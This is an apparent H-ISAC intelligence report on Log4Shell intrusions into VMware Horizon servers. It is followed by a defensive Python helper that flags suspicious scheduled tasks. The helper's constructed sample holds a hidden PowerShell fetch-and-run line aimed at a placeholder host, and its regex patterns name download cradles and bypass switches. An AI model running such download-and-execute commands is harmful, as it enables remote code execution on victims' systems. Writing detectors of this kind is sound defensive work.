H-ISAC TLP White Finished Intelligence Report Log4Shell Malware Analysis Report July 29, 2022

All members are encouraged to review Malware Analysis Report (AR22-203A): MAR-10386789-1.v1 - Log4Shell for the full report details and established YARA rules. 

The Indicators of Compromise associated with this report have been entered into Health-ISAC's automated sharing platform for members ingesting automated threat indicators. 

Upon the disclosure of the critical Log4Shell vulnerability, both opportunistic and highly skilled threat actors have exhibited an increased appetite for the exploitation of systems affected by the security flaw. Since December 2021, the cyber threat landscape has been plagued by multiple threat actors targeting and exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway (UAG) servers. From May through June 2022, CISA provided remote incident support at an organization where CISA observed suspected Log4Shell PowerShell downloads. During remote support, CISA confirmed the organization was compromised by malicious cyber actors who exploited Log4Shell in a VMware Horizon server that did not have patches or workarounds applied. CISA analyzed five malware samples obtained from the organization’s network, including two malicious PowerShell files, two Extensible Markup Language (XML) files, and a 64-bit compiled Python Portable Executable (PE) file.

The two PowerShell files are Trojan downloaders designed to download malicious files from a command and control (C2) server and install them on the compromised system. One of the scripts also checks for and installs Nmap if it is not installed on the compromised system. The two XML files are for scheduling tasks for persistence. The 64-bit compiled Python PE file is designed to perform scans for IP addresses of live hosts, open ports, and services running on those hosts. 
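The XML files described above are Task Scheduler definitions used for persistence, and the PowerShell files are downloaders. A defender reviewing a Horizon host can export every registered task (for example with schtasks /query /xml) and triage the action lines for PowerShell download and hiding patterns. The following triage helper is an added example; it is not code from the H-ISAC report or the CISA MAR, and the task names, the placeholder URL and both XML samples are constructed for illustration rather than taken from the incident.

```python
"""
Added example (not from the H-ISAC report or CISA MAR-10386789-1.v1): triage
exported Windows Task Scheduler XML and flag tasks whose <Exec> action launches
PowerShell with download-cradle, encoded-command or window-hiding switches,
the persistence pattern the report describes. All sample data is constructed.
"""
import re
import xml.etree.ElementTree as ET

# Default namespace used by Task Scheduler XML exports.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Indicators worth a human look in a scheduled task's command line.
SUSPICIOUS = {
    "powershell_launcher": re.compile(r"(?i)\b(powershell|pwsh)(\.exe)?\b"),
    "download_cradle": re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|Net\.WebClient"
    ),
    "encoded_command": re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s"),
    "hidden_or_bypass": re.compile(
        r"(?i)-(w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|nop(rofile)?)\b"
    ),
}


def analyze_task_xml(xml_text: str) -> dict:
    """Return the task URI, whether it looks suspicious, and per-action findings."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    findings = []
    for exec_el in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exec_el.findtext("t:Command", default="", namespaces=NS)
        args = exec_el.findtext("t:Arguments", default="", namespaces=NS)
        line = f"{cmd} {args}".strip()
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(line)]
        if hits:
            findings.append({"command_line": line, "indicators": hits})
    return {"task": uri, "suspicious": bool(findings), "findings": findings}


def triage_tasks(xml_docs) -> list:
    """Analyze several exported task definitions and keep only the suspicious ones."""
    return [r for r in (analyze_task_xml(doc) for doc in xml_docs) if r["suspicious"]]


# Constructed sample: a task name chosen to blend in, running a hidden PowerShell downloader.
SAMPLE_MALICIOUS = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Maintenance\Updater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: an ordinary maintenance task that should not be flagged.
SAMPLE_BENIGN = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Defrag\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for result in triage_tasks([SAMPLE_BENIGN, SAMPLE_MALICIOUS]):
        print(result["task"])
        for f in result["findings"]:
            print("  ", ", ".join(f["indicators"]), "->", f["command_line"])
```

The patterns are deliberately broad; a hit is a prompt for analyst review, not a verdict. In practice, compare flagged tasks against the YARA rules and indicators in the MAR referenced above, and check the task's author and creation time against the Log4Shell exposure window.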
